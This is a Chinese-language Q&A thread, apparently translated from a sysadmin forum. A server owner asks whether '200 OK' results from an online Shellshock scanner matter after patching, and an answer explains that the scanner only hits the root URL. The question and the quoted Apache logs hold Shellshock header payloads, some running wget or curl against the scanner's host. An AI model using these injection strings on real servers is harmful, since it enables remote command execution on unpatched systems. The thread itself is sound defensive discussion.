ShellShock测试显示wget和curl访问

Question

我在我的Debian 6服务器上修复了check休克bug，在http://shellshock.brandonpotter.com/上测试时，我得到了“没有发现漏洞”，这是可以的，但是他们也检查其他事情，在测试日志中我得到：

URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
...
...
...

"200 OK“这个可以吗? 200的意思是可以访问。我已经检查了其他几个域，其中一些还显示了"200确定“，但其他显示”错误“。

它能保持这样吗，还是我应该修复这个？如果是的话，我该怎么做？

Answer 1

我在我的网站上查过了，你不用担心。

这个站点在/上做了一些测试，他们不调用特定的cgi脚本。这将导致200 OK，而不管所传递的引用程序或用户代理试图利用什么。

这是我的apache日志显示的一个例子：

75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-"
75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"